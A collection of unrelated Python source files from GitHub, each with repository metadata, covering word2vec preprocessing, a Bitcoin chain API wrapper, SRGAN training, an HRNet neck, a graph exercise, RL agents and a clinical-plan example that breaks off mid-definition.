content_POS = list(np.load('all_content_POS.npy'))
"""取出n,a,d,v詞性的詞"""
sentiment_POS = []
sentiment_content = []
ADNV = [1,3,7,13]
for sentence in content_POS:
sen = []
for word in sentence:
if word[1] in ADNV:
sen.append(word)
if len(sen) != 0:
sentiment_POS.append(sen)
"""刪除停用詞"""
print("delete stopword")
stopwordset = set()
with open('stopwords.txt','r',encoding='utf-8') as sw:
stopwordset.add(' ')
for line in sw:
stopwordset.add(line.strip('\n'))
for sentence in sentiment_POS:
temp_sen = []
for word in sentence:
if word[0] not in stopwordset:
temp_sen.append(word[0])
sentiment_content.append(temp_sen)
f = open('sentiment_content.txt', 'w', encoding='utf-8')
spamwriter = csv.writer(f, lineterminator = '\n', delimiter=' ', quoting = csv.QUOTE_NONE)
spamwriter.writerows(sentiment_content)
f.close()
"""訓練詞向量"""
print("train word2vec")
sentences = word2vec.Text8Corpus('sentiment_content.txt')
model = word2vec.Word2Vec(sentences, size=250) # default sg = 0, use CBOW, hs = 0, use negative smapling
model.save_word2vec_format(u'med250.model.bin', binary=True)
"""bin檔轉txt,讀單詞向量"""
model = word2vec.Word2Vec.load_word2vec_format('med250.model.bin', binary=True)
model.save_word2vec_format('med250.model.txt', binary=False)
word_list = []
vec_list = []
f = open('med250.model.txt','r',encoding = 'utf-8')
for r,row in enumerate(csv.reader(f)):
if r==0:
line = row[0].split(' ')
total_num = int(line[0])
vec_len = int(line[1])
#np.save('total_num',total_num)
else:
line = row[0].split(' ')
word = line[0]
vec = []
for v in line[1:250]:
vec.extend([float(v)])
word_list.extend([word])
vec_list.append(vec)
np.save('word_list',word_list)
np.save('vec_list',vec_list)
f.close()
# word_vec = [list(np.load('word_list.npy')),np.load('vec_list.npy')]
| Maomaomaoing/Sacasm-Detection | 2.word2vector_pre.py | 2.word2vector_pre.py | py | 2,254 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "csv.writer",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "csv.QUOTE_NONE",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "gensim.models.word2vec.Text... |
72284442024 | import kth_native as nat
import sys
import time
import asyncio
import kth
# def fetch_last_height_async(chain):
# loop = asyncio.get_event_loop()
# fut = loop.create_future()
# nat.chain_fetch_last_height(chain, lambda err, h: fut.set_result((err, h)))
# return fut
def generic_async_1(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a: fut.set_result((a)))
return fut
def generic_async_2(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a, b: fut.set_result((a, b)))
return fut
def generic_async_3(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a, b, c: fut.set_result((a, b, c)))
return fut
def generic_async_4(func, *args):
loop = asyncio.get_event_loop()
fut = loop.create_future()
func(*args, lambda a, b, c, d: fut.set_result((a, b, c, d)))
return fut
# async def generic_async_3(func, *args):
# future = asyncio.Future()
# loop = asyncio.get_event_loop()
# def callback(args):
# loop.call_soon_threadsafe(future.set_result, args)
# func(*args, callback)
# callback_args = await future
# return callback_args
##
# Represents the Bitcoin blockchain.
class Chain:
def __init__(self, executor, chain):
##
# @private
self._executor = executor
self._chain = chain
# Gets the height of the highest block in the local copy of the blockchain.
# This number will grow as the node synchronizes with the blockchain.
# This is an asynchronous method; a callback must be provided to receive the result
async def getLastHeight(self):
# ret = await fetch_last_height_async(self._chain)
ret = await generic_async_2(nat.chain_fetch_last_height, self._chain)
return ret
# Given a block hash, it queries the chain for the block height.
async def getBlockHeight(self, hash):
# nat.chain_fetch_block_height(self._chain, hash, handler)
ret = await generic_async_2(nat.chain_fetch_block_height, self._chain, hash)
return ret
# Get the block header from the specified height in the chain.
async def getBlockHeaderByHeight(self, height):
# nat.chain_fetch_block_header_by_height(self._chain, height, self._fetch_block_header_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_header_by_height, self._chain, height)
if err != 0:
return (err, None, height)
return (err, kth.chain.Header.fromNative(obj), height)
# Get the block header from the specified block hash.
async def getBlockHeaderByHash(self, hash):
# nat.chain_fetch_block_header_by_hash(self._chain, hash, self._fetch_block_header_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_header_by_hash, self._chain, hash)
if err != 0:
return (err, None, height)
return (err, kth.chain.Header.fromNative(obj), height)
# Gets a block from the specified height in the chain.
async def getBlockByHeight(self, height):
# nat.chain_fetch_block_by_height(self._chain, height, self._fetch_block_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_by_height, self._chain, height)
if err != 0:
return (err, None, height)
return (err, kth.chain.Block.fromNative(obj), height)
# Gets a block from the specified hash.
async def getBlockByHash(self, hash):
# nat.chain_fetch_block_by_hash(self._chain, hash, self._fetch_block_converter)
(err, obj, height) = await generic_async_3(nat.chain_fetch_block_by_hash, self._chain, hash)
if err != 0:
return (err, None, height)
return (err, kth.chain.Block.fromNative(obj), height)
# Get a transaction by its hash.
async def getTransaction(self, hash, require_confirmed):
# nat.chain_fetch_transaction(self._chain, hash, require_confirmed, self._fetch_transaction_converter)
(err, obj, index, height) = await generic_async_4(nat.chain_fetch_transaction, self._chain, hash, require_confirmed)
if err != 0:
return (err, None, index, height)
return (err, kth.chain.Transaction.fromNative(obj), index, height)
# Given a transaction hash, it fetches the height and position inside the block.
async def getTransactionPosition(self, hash, require_confirmed):
# nat.chain_fetch_transaction_position(self._chain, hash, require_confirmed, handler)
ret = await generic_async_3(nat.chain_fetch_transaction_position, self._chain, hash, require_confirmed)
return ret
##
# Given a block height in the chain, it retrieves the block's associated Merkle block.
# Args:
# height (unsigned int): Block height in the chain.
# handler (Callable (error, merkle_block, block_height)): Will be executed when the chain is queried.
# * error (int): Error code. 0 if successful.
# * merkle_block (MerkleBlock): The requested block's Merkle block.
# * block_height (unsigned int): The block's height in the chain.
def fetch_merkle_block_by_height(self, height, handler):
self._fetch_merkle_block_handler = handler
nat.chain_fetch_merkle_block_by_height(self._chain, height, self._fetch_merkle_block_converter)
##
# Given a block hash, it retrieves the block's associated Merkle block.
# Args:
# hash (bytearray): 32 bytes of the block hash.
# handler (Callable (error, merkle_block, block_height)): Will be executed when the chain is queried.
# * error (int): Error code. 0 if successful.
# * merkle_block (MerkleBlock): The requested block's Merkle block.
# * block_height (unsigned int): The block's height in the chain.
def fetch_merkle_block_by_hash(self, hash, handler):
self._fetch_merkle_block_handler = handler
nat.chain_fetch_merkle_block_by_hash(self._chain, hash, self._fetch_merkle_block_converter)
# ----------------------------------------------------------------------------
# Note: removed on 3.3.0
# def _fetch_output_converter(self, e, output):
# if e == 0:
# _output = Output(output)
# else:
# _output = None
# self._fetch_output_handler(e, _output)
# ##
# # Get a transaction output by its transaction hash and index inside the transaction.
# # Args:
# # hash (bytearray): 32 bytes of the transaction hash.
# # index (unsigned int): Output index inside the transaction (starting at zero).
# # require_confirmed (int): 1 if and only if transaction should be in a block, 0 otherwise.
# # handler (Callable (error, output)): Will be executed when the chain is queried.
# # * error (int): Error code. 0 if successful.
# # * output (Output): Output found.
# def fetch_output(self, hash, index, require_confirmed, handler):
# self._fetch_output_handler = handler
# nat.chain_fetch_output(self._chain, hash, index, require_confirmed, self._fetch_output_converter)
# ----------------------------------------------------------------------------
async def organizeBlock(self, block):
# void chain_organize_handler(kth_chain_t chain, void* ctx, kth_error_code_t error) {
ret = await generic_async_1(nat.chain_organize_block, self._chain, block.toNative())
return ret
# nat.chain_organize_block(self._chain, block, handler)
async def organizeTransaction(self, transaction):
# nat.chain_organize_transaction(self._chain, transaction, handler)
ret = await generic_async_1(nat.chain_organize_transaction, self._chain, transaction.toNative())
return ret
##
# Determine if a transaction is valid for submission to the blockchain.
# Args:
# transaction (Transaction): transaction to be checked.
# handler (Callable (error, message)): Will be executed after the chain is queried.
# * error (int): error code. 0 if successful.
# * message (str): string describing the result of the query. Example: 'The transaction is valid'
def validate_tx(self, transaction, handler):
nat.chain_validate_tx(self._chain, transaction, handler)
def _fetch_compact_block_converter(self, e, compact_block, height):
if e == 0:
_compact_block = _CompactBlock(compact_block)
else:
_compact_block = None
self._fetch_compact_block_handler(e, _compact_block, height)
def _fetch_compact_block_by_height(self, height, handler):
self._fetch_compact_block_handler = handler
nat.chain_fetch_compact_block_by_height(self._chain, height, self._fetch_compact_block_converter)
def _fetch_compact_block_by_hash(self, hash, handler):
self._fetch_compact_block_handler = handler
nat.chain_fetch_compact_block_by_hash(self._chain, hash, self._fetch_compact_block_converter)
def _fetch_spend_converter(self, e, point):
if e == 0:
_spend = Point(point)
else:
_spend = None
self._fetch_spend_handler(e, _spend)
##
# Fetch the transaction input which spends the indicated output. The `fetch_spend_handler`
# callback will be executed after querying the chain.
# Args:
# output_point (OutputPoint): tx hash and index pair.
# handler (Callable (error, input_point)): Will be executed when the chain is queried.
# * error (int): Error code. 0 if successful.
# * input_point (Point): Tx hash and index pair where the output was spent.
def fetch_spend(self, output_point, handler):
self._fetch_spend_handler = handler
nat.chain_fetch_spend(self._chain, output_point._ptr, self._fetch_spend_converter)
def _subscribe_blockchain_converter(self, e, fork_height, blocks_incoming, blocks_replaced):
if self._executor.stopped or e == 1:
return False
if e == 0:
_incoming = BlockList(blocks_incoming) if blocks_incoming else None
_replaced = BlockList(blocks_replaced) if blocks_replaced else None
else:
_incoming = None
_replaced = None
return self._subscribe_blockchain_handler(e, fork_height, _incoming, _replaced)
def subscribe_blockchain(self, handler):
self._subscribe_blockchain_handler = handler
nat.chain_subscribe_blockchain(self._executor._executor, self._chain, self._subscribe_blockchain_converter)
def _subscribe_transaction_converter(self, e, tx):
if self._executor.stopped or e == 1:
return False
if e == 0:
_tx = Transacion(tx) if tx else None
else:
_tx = None
self._subscribe_transaction_handler(e, _tx)
def _subscribe_transaction(self, handler):
self._subscribe_transaction_handler = handler
nat.chain_subscribe_transaction(self._executor._executor, self._chain, self._subscribe_transaction_converter)
def unsubscribe(self):
nat.chain_unsubscribe(self._chain)
##
# @var history_fetch_handler_
# Internal callback which is called by the native fetch_history function and marshalls parameters to the managed callback
##
# @var fetch_block_header_handler_
# Internal callback which is called by the native fetch_block_header function and marshalls parameters to the managed callback
# ----------------------------------------------------------------------
# TODO(fernando): implement the following
# ----------------------------------------------------------------------
# ##
# # Get a list of output points, values, and spends for a given payment address.
# # This is an asynchronous method; a callback must be provided to receive the result
# #
# # Args:
# # address (PaymentAddress): Wallet to search.
# # limit (unsigned int): Max amount of results to fetch.
# # from_height (unsigned int): Starting height to search for transactions.
# # handler (Callable (error, list)): Will be executed when the chain is queried.
# # * error (int): Error code. 0 if and only if successful.
# # * list (HistoryList): A list with every element found.
# def fetch_history(self, address, limit, from_height, handler):
# self.history_fetch_handler_ = handler
# nat.chain_fetch_history(self._chain, address, limit, from_height, self._history_fetch_handler_converter)
# def _history_fetch_handler_converter(self, e, l):
# if e == 0:
# list = HistoryList(l)
# else:
# list = None
# self.history_fetch_handler_(e, list)
# ##### Stealth
# def _stealth_fetch_handler_converter(self, e, l):
# if e == 0:
# _list = StealthList(l)
# else:
# _list = None
# self._stealth_fetch_handler(e, _list)
# ##
# # Get metadata on potential payment transactions by stealth filter.
# # Given a filter and a height in the chain, it queries the chain for transactions matching the given filter.
# # Args:
# # binary_filter_str (string): Must be at least 8 bits in length. example "10101010"
# # from_height (unsigned int): Starting height in the chain to search for transactions.
# # handler (Callable (error, list)): Will be executed when the chain is queried.
# # * error (int): Error code. 0 if and only if successful.
# # * list (StealthList): list with every transaction matching the given filter.
# def fetch_stealth(self, binary_filter_str, from_height, handler):
# self._stealth_fetch_handler = handler
# binary_filter = Binary.construct_string(binary_filter_str)
# nat.chain_fetch_stealth(self._chain, binary_filter._ptr, from_height, self._stealth_fetch_handler_converter)
| k-nuth/py-api | kth/chain/chain.py | chain.py | py | 14,093 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "asyncio.get_event_loop",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "... |
5491251302 | import sys
import os
sys.path.append(os.path.abspath('.'))
import torch
import utils as ut
from train import *
from dataset import load_train_data, load_test_data
import constants
def main(config):
# Fixed random number seed
torch.manual_seed(config.seed)
torch.cuda.manual_seed_all(config.seed)
# Initialize image evaluation metrics
best_psnr = 0.0
best_ssim = 0.0
if config.train.checkpoint.is_log:
ut.log_on_train_start(log_name=config.exp_name, config=config)
checkpoint_dir = os.path.join(constants.ROOT, 'model', config.exp_name)
ut.create_dir(checkpoint_dir)
# Define basic elements for training
netG, netD = define_model(config)
# optimG = define_optimizer(netG, config)
# optimD = define_optimizer(netD, config)
optimG = optim.Adam(netG.parameters(),
lr=config.train.optim.lr,
betas=config.train.optim.betas)
optimD = optim.Adam(netD.parameters(),
lr=config.train.optim.lr,
betas=config.train.optim.betas)
schedulerG = define_scheduler(optimG, config)
schedulerD = define_scheduler(optimD, config)
if config.train.checkpoint.load_model:
G_state_dict, optimG_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.gen)
D_state_dict, optimD_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.disc)
netG.load_state_dict(G_state_dict)
netD.load_state_dict(D_state_dict)
optimG.load_state_dict(optimG_state_dict)
optimD.load_state_dict(optimD_state_dict)
# Loss function
content_criteria = nn.MSELoss()
adversarial_criteria = nn.BCEWithLogitsLoss()
feature_extractor = VGGLoss()
feature_extractor = feature_extractor.to(constants.DEVICE)
feature_extractor.eval()
# Data loader
print("Loading data ...")
train_loader = load_train_data(root=config.train.dataset.data_dir, batch_size=config.train.hyp.batch_size)
test_loader = load_test_data(hr_root=config.test.dataset.hr_dir, lr_root=config.test.dataset.lr_dir)
print("Finish loading data")
for epoch in range(config.train.hyp.num_epoch):
netG.train()
netD.train()
D_loss, G_loss = train(
train_loader,
epoch,
netG,
netD,
optimG,
optimD,
content_criteria,
adversarial_criteria,
feature_extractor,
config)
schedulerD.step()
schedulerG.step()
psnr, ssim = test(test_loader, netG)
is_best = psnr > best_psnr and ssim > best_psnr
best_psnr = max(psnr, best_psnr)
best_ssim = max(ssim, best_ssim)
print("D_loss: %.6f, G_loss: %.6f, psnr: %.6f, ssim: %.6f" % (D_loss, G_loss, psnr, ssim))
ut.save_checkpoint(
{
"epoch": epoch + 1,
"model": netD.state_dict(),
"optimizer": optimD.state_dict(),
},
f'{checkpoint_dir}/disc_{epoch+1}.pth.tar',
f'{checkpoint_dir}/disc_best.pth.tar',
is_best)
ut.save_checkpoint(
{
"epoch": epoch + 1,
"model": netG.state_dict(),
"optimizer": optimG.state_dict(),
},
f'{checkpoint_dir}/gen_{epoch+1}.pth.tar',
f'{checkpoint_dir}/gen_best.pth.tar',
is_best)
if __name__ == '__main__':
main_config = ut.read_config(os.path.join(constants.ROOT,'config/config.yaml'))
main(main_config)
| daoduyhungkaistgit/SRGAN | src/main.py | main.py | py | 3,641 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
18482571232 | import math
import torch.nn as nn
class HRNET_NECK(nn.Module):
def __init__(self, in_channels, feature_size=256):
super(HRNET_NECK, self).__init__()
C2_size, C3_size, C4_size, C5_size = in_channels
# P2
self.P2_1 = nn.Conv2d(C2_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P2_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P3
self.P3_1 = nn.Conv2d(C3_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P3_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P4
self.P4_1 = nn.Conv2d(C4_size, feature_size, kernel_size=1, stride=1, padding=0)
self.P4_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# P5
self.P5_1 = nn.Conv2d(C5_size, feature_size, kernel_size=1, stride=1, padding=0)
# "P6 is obtained via a 3x3 stride-2 conv on C5"
self.P6 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
# "P6 is computed by applying ReLU followed by a 3x3 stride-2 conv on P6"
self.P7_1 = nn.ReLU()
self.P7_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, inputs):
C2, C3, C4, C5 = inputs
P2_x = self.P2_1(C2)
P2_downsample = self.P2_2(P2_x)
P3_x = self.P3_1(C3)
P3_x = P2_downsample + P3_x
P3_downsample = self.P3_2(P3_x)
P4_x = self.P4_1(C4)
P4_x = P4_x + P3_downsample
P4_downsample = self.P4_2(P4_x)
P5_x = self.P5_1(C5)
P5_x = P5_x + P4_downsample
P6_x = self.P6(P5_x)
P7_x = self.P7_1(P6_x)
P7_x = self.P7_2(P7_x)
return [P3_x, P4_x, P5_x, P6_x, P7_x]
| TWSFar/FCOS | models/necks/hrnet_neck.py | hrnet_neck.py | py | 2,155 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
30569760677 | from typing import List, Tuple
def create_adjacent_list(edges):
adjacent_list = dict()
for edge in edges:
if adjacent_list.get(edge[0]):
adjacent_list[edge[0]].append(edge[1])
else:
adjacent_list[edge[0]] = [edge[1]]
return adjacent_list
def solution(n: int, m: int, edges: List[Tuple[int, int]]):
adjacents_list = create_adjacent_list(edges)
for i in range(1, n + 1):
temp = [0] * n
if adjacents_list.get(i):
vertex = adjacents_list.get(i)
for v in vertex:
temp[v - 1] = 1
print(' '.join(map(str, temp)))
def input_data():
n, m = map(int, input().strip().split())
rows = m
edges = list()
while rows:
edges.append(tuple(map(int, input().strip().split())))
rows -= 1
return n, m, edges
if __name__ == '__main__':
solution(*input_data())
"""
5 3
1 3
2 3
5 2
"""
| fenixguard/yandex_algorithms | sprint_6/B.exchange_edges_list_to_adjacent_list.py | B.exchange_edges_list_to_adjacent_list.py | py | 935 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 14,
"usage_type": "name"
}
] |
8860920055 | from collections import defaultdict
import Policy as policy
import random
import numpy as np
import matplotlib.pyplot as plt
# import pytorch as torch
class Agent:
def __init__(self, env) -> None:
self.env = env
# replay_buffer = {(state, action) : (state_, reward)}
self.replay_buffer = defaultdict(lambda : tuple(list, float))
# visisted_states = {state}
self.visisted_states = set()
self.state = self.env.reset()
# Decide an action from a given state
# Returns True if the environment is done (won or lost)
def next(self) -> bool:
return False
# Shallow agent for discrete environments or continuous environments with a small state space
class ShallowAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
# self.v = {state : value}
self.V = defaultdict(lambda : 0)
# self.q = {(state, action) : value}
self.Q = defaultdict(lambda : 0)
# Deep agent for continuous environments or discrete environments with a large state space
class DeepAgent(Agent):
def __init__(self, env, weight_size) -> None:
super().__init__(env)
# self.w = torch.rand(weight_size)
class DiscreteQLearningAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
class DiscreteActionValueIterationAgent(Agent):
def __init__(self, env, policy = policy.random) -> None:
super().__init__(env)
self.policy = policy
def next(self) -> bool:
# Action value iteration function
q = defaultdict(lambda : 0)
for state in self.env.get_states():
for action in self.env.A(state):
trans_prob = self.env.get_transistion_probabilities(state, action)
temp = 0
for next_state, reward in trans_prob:
pi = self.policy(self.env, next_state, self.q)
temp += trans_prob[(next_state, reward)]*(reward + 0.99*sum([pi[action_] * self.q[(next_state,action_)] for action_ in self.env.A(next_state)]))
q[(state,action)] = temp
self.q = q
# Value iteration function
v = defaultdict(lambda : 0)
for state in self.env.get_states():
actions = self.env.A(state)
for action in actions:
pi = 1/len(actions)
temp = 0
trans_prob = self.env.get_transistion_probabilities(state, action)
# Get reward, next state
for next_state, reward in trans_prob.keys():
temp += trans_prob[(next_state,reward)]*(reward + 0.99*self.v[next_state])
pi = self.policy(self.env, state, self.q)
v[state] += pi[action] * temp
self.v = v
return True
class ManualAgent(Agent):
def __init__(self, env) -> None:
super().__init__(env)
def next(self):
while(True):
print("Current state: " + str(self.env.state))
print("Total reward: " + str(self.env.get_accumulative_reward(self)))
print("---------------")
print("Enter next action")
print("Avaliable actions: " + str(self.env.A(self.state)))
try:
action = input()
if action == "exit":
return False
action = int(action)
print("\n")
if(action <= self.env.A(self.state)[-1]):
next_state, reward = self.env.step(self.state, action)
self.state = next_state
self.visited_states.append(self.state)
self.previous_actions.append(action)
self.obtained_rewards.append(reward)
print("---------------")
print("Reward: " + str(reward))
print("---------------")
return True
else:
print("Invalid action")
except ValueError:
print("The provided string is not a valid representation of an integer.\n"+
"Please enter a valid integer in the action space")
| TheGoldenChicken/robust-rl | rl/agent.py | agent.py | py | 4,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 36,
"usage_type": "call"
},
{
"api_name"... |
25163328807 | import operator
import pandas as pd
from easul.action import ResultStoreAction
from easul.algorithm import StoredAlgorithm
from easul.algorithm.factor import OperatorFactor
from easul.data import DataSchema, DFDataInput
from easul.step import VisualStep
from easul.visual import Visual
from easul.visual.element import Prediction
from easul.visual.element.container import HorizContainer, CardContainer, Container
from easul.visual.element.journey import JourneyMap
from easul.visual.element.overall import RocCurve, Accuracy, BalancedAccuracy, Ppp, Npp, Sensitivity, Matthews, \
ModelScore
from easul.visual.element.prediction import ProbabilityPlot, LimeTablePlot
from easul.visual.element.overall import Specificity
import os
import numpy as np
EXAMPLE_PATH = os.path.dirname(__file__) + "/support"
DIABETES_FILE = EXAMPLE_PATH + "/diabetes.txt"
def diabetes_progression_algorithm():
from easul.algorithm import ClassifierAlgorithm
from sklearn.linear_model import LogisticRegression
diab_train = diabetes_progression_dataset()
diab_alg = ClassifierAlgorithm(title="Diabetes progression", model=LogisticRegression(max_iter=500), schema=diab_train.schema)
diab_alg.fit(diab_train)
return diab_alg
def diabetes_progression_dataset():
diab_dset = load_diabetes(raw=True, as_classifier=True)
diab_train, diab_test = diab_dset.train_test_split(train_size=0.75)
return diab_train
# *Data Set Characteristics:**
# :Number of Instances: 442
#
# :Number of Attributes: First 10 columns are numeric predictive values
#
# :Target: Column 11 is a quantitative measure of disease progression one year after baseline
#
# :Attribute Information:
# - age age in years
# - sex
# - bmi body mass index
# - bp average blood pressure
# - s1 tc, total serum cholesterol
# - s2 ldl, low-density lipoproteins
# - s3 hdl, high-density lipoproteins
# - s4 tch, total cholesterol / HDL
# - s5 ltg, possibly log of serum triglycerides level
# - s6 glu, blood sugar level
#
# Note: Each of these 10 feature variables have been mean centered and scaled by the standard deviation times `n_samples` (i.e. the sum of squares of each column totals 1).
#
# Source URL:
# https://www4.stat.ncsu.edu/~boos/var.select/diabetes.html
#
# For more information see:
# Bradley Efron, Trevor Hastie, Iain Johnstone and Robert Tibshirani (2004) "Least Angle Regression," Annals of Statistics (with discussion), 407-499.
# (https://web.stanford.edu/~hastie/Papers/LARS/LeastAngle_2002.pdf)
def load_diabetes(raw=False, as_classifier=False):
import pandas as pd
if raw:
schema = DataSchema(
schema={
"age": {"type": "number", "help": "Age in years"},
"sex": {"type": "category", "options": {1: "Male", 2: "Female"}, "help": "Gender",
"pre_convert": "integer"},
"bmi": {"type": "number", "help": "Body mass index"},
"bp": {"type": "number", "help": "Avg blood pressure"},
"s1": {"type": "number", "help": "tc, total serum cholesterol"},
"s2": {"type": "number", "help": "ldl, low-density lipoproteins"},
"s3": {"type": "number", "help": "hdl, high-density lipoproteins"},
"s4": {"type": "number", "help": "tch, total cholesterol / HDL"},
"s5": {"type": "number", "help": "ltg, possibly log of serum triglycerides level"},
"s6": {"type": "number", "help": "glu, blood sugar level"},
"y": {
"type": "number",
"help": "disease progression (<1 yr)"
}
},
y_names=["y"],
)
df = pd.read_csv(
DIABETES_FILE, delimiter="\t"
)
else:
schema = DataSchema(
schema={
"age": {"type": "number", "help": "Age in years", "min": -1, "max": 1},
"sex": {"type": "category", "options": {-0.04464: "Male", 0.05068: "Female"}, "help": "Gender",
"pre_convert": "integer"},
"bmi": {"type": "number", "help": "Body mass index", "min": -1, "max": 1},
"bp": {"type": "number", "help": "Avg blood pressure", "min": -1, "max": 1},
"s1": {"type": "number", "help": "tc, total serum cholesterol", "min": -1, "max": 1},
"s2": {"type": "number", "help": "ldl, low-density lipoproteins", "min": -1, "max": 1},
"s3": {"type": "number", "help": "hdl, high-density lipoproteins", "min": -1, "max": 1},
"s4": {"type": "number", "help": "tch, total cholesterol / HDL", "min": -1, "max": 1},
"s5": {"type": "number", "help": "ltg, possibly log of serum triglycerides level", "min": -1, "max": 1},
"s6": {"type": "number", "help": "glu, blood sugar level", "min": -1, "max": 1},
"y": {
"type": "number",
"help": "disease progression (<1 yr)"
}
},
y_names=["y"],
)
from sklearn.datasets import load_diabetes
diabetes = load_diabetes()
df = pd.DataFrame(data=diabetes.data, columns=diabetes.feature_names)
df["y"] = diabetes.target
if as_classifier:
schema["y"] = {"type": "category", "help": "Boolean flag for disease progression",
"pre_convert": "integer", "options": {0: "No progression", 1: "Progression"}}
df["y"] = df["y"].apply(lambda x: 1 if x > 150 else 0)
return DFDataInput(data=df, schema=schema)
model_scope_elements = [
CardContainer(
title="The rating below is an average of the accuracies, correlation and AUC scores",
name="rating_card",
elements=[
ModelScore(title="What is the model rating (out of 100)"),
CardContainer(title="The individual aspects of the model can be examined below",
name="individual_card",
heading_level=5,
elements=[
HorizContainer(
elements=[
RocCurve(name="roc", title="ROC curve", width=5, height=5),
Container(
elements=[
Accuracy(name="accu", title="How accurate is the model overall?",
round_dp=1),
BalancedAccuracy(name="bal_accu",
title="How accurate if the responses were balanced?",
round_dp=1),
Ppp(name="ppp", title="Positives correctly identified (PPV)",
round_dp=1),
Npp(name="ppp", title="Negatives correctly identified (NPV)",
round_dp=1),
Sensitivity(name="sens",
title="True positives out of identified positives (Sensitivity)",
round_dp=1),
Specificity(name="specs",
title="True negatives out of identified negatives (Specificity)",
round_dp=1),
Matthews(name="matt",
title="Prediction correlation (Matthews) (between -1 and 1)",
round_dp=1
)
]
)
]
)
]
)
]
)
]
row_scope_elements = [
HorizContainer(elements=[
CardContainer(
title="Prediction and probabilities of survival or death",
elements=[
HorizContainer(elements=[
Prediction(name="pred", title="Prediction", show_label=True, as_value=False,
html_class="bg-info",
html_tag="h5"),
ProbabilityPlot(name="probs", height=4, width=4, title="Probability plot")
]),
CardContainer(
title="Explanation of how supplied values affect the likelihood of this prediction?",
name="lime_card",
heading_level=5,
elements=[
LimeTablePlot()
])
])
])
]
def complex_plan():
    """Build the demo "CAP" plan: admission -> catheter check -> ITU or discharge.

    Step/source lookups (e.g. get_step("catheter_check") inside the admission
    step) occur before those items are registered, so Plan references are
    presumably resolved lazily — left unchanged here. TODO(review): confirm
    against easul.plan.Plan.
    """
    from easul.decision import BinaryDecision
    from easul.plan import Plan
    from easul.visual.element.journey import JourneyMap
    from easul.state import State
    from easul.step import EndStep, StartStep, Step, AlgorithmStep, PreStep, VisualStep
    from easul.visual import Visual
    from easul.action import PreRunStateAction

    complex_plan = Plan(title="CAP")
    # Single state tracking where the patient is in the admission workflow.
    complex_plan.add_state("admission_state", State(label="admission", default=None))
    # Terminal steps.
    complex_plan.add_step("discharge", EndStep(
        title="Discharge",
        actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="discharged")]
    ))
    complex_plan.add_step("itu", EndStep(
        title="ITU",
        actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="itu")]
    ))
    complex_plan.add_step("admission", StartStep(
        title="Patient admission",
        actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="admitted")],
        next_step=complex_plan.get_step("catheter_check")
    ))
    # Chart-only step rendering the plan's journey map.
    # BUG FIX: a second add_step("flowchart", ...) titled "Diabetes logic map"
    # (copy/pasted from the diabetes example) previously re-registered this key
    # and clobbered the CAP title; the duplicate registration has been removed.
    complex_plan.add_step("flowchart", Step(
        title="CAP logic map",
        visual=Visual(
            elements=[
                JourneyMap(route_only=False, start_step="admission")
            ]),
        exclude_from_chart=True
    ))
    # Schema for the simple catheter score (DataSchema comes from module scope).
    complex_plan.add_schema("catheter",
                            DataSchema(
                                schema={
                                    "systolic_bp": {"type": "number"},
                                    "score": {"type": "number"}
                                },
                                y_names=["score"]
                            )
                            )
    from easul.algorithm import ScoreAlgorithm
    # One penalty point when systolic BP exceeds 90.
    complex_plan.add_algorithm("catheter",
                               ScoreAlgorithm(
                                   title="Catheter algorithm",
                                   schema=complex_plan.get_schema("catheter"),
                                   factors=[OperatorFactor(operator=operator.gt, input_field="systolic_bp", value=90,
                                                           penalty=1, title="High systolic BP")]
                               )
                               )
    complex_plan.add_step("catheter_check", AlgorithmStep(
        title="Catheter check",
